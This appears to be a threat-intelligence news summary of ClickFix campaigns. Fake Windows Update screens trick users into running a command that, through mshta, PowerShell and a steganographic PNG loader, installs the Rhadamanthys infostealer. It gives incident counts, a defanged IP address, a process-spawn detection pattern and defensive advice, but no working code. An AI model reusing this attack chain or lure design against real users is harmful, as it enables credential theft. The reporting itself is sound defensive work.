Recent ClickFix attacks, utilizing counterfeit Windows Update screens, are deceiving users into downloading infostealer malware. The operation involves a full-screen blue Windows Update prompt urging a "critical security update", which users initiate by opening the Run prompt and executing a command.
Methodology and Deception
The deceptive command initiates a multi-stage attack chain. Initially, mshta.exe retrieves a URL containing a hex-encoded second octet. This initiates PowerShell to decrypt and load a .NET assembly. The assembly employs a steganographic loader to extract shellcode hidden in PNG images, ultimately deploying the Rhadamanthys infostealer to harvest login credentials.
- Mshta.exe initiates the attack with a hex-encoded URL.
- PowerShell decrypts and loads a .NET assembly.
- Steganographic loader extracts Donut-packed shellcode from PNGs.
- Rhadamanthys infostealer is deployed to steal credentials.
Investigations and Regional Impact
According to Huntress, from 2025-09-29 to 2025-10-30, 76 incidents were analyzed, affecting organizations across the U.S., EMEA, and APJ regions. At least one involved IP address is 141.98.80[.]175.
The lure site associated with the Windows Update scam contained comments in Russian. Despite some law enforcement takedowns (Operation Endgame) starting 2025-11-13, several domains associated with these attacks remained active by 2025-11-19.
Defense Strategies and Recommendations
To counter such scams, experts suggest blocking the Windows Run box and educating staff that official CAPTCHAs or Windows Updates never require command execution. Utilizing endpoint detection and response systems is critical to monitor unexpected processes like explorer.exe spawning mshta.exe, powershell.exe, or similar binaries with unusual command lines.
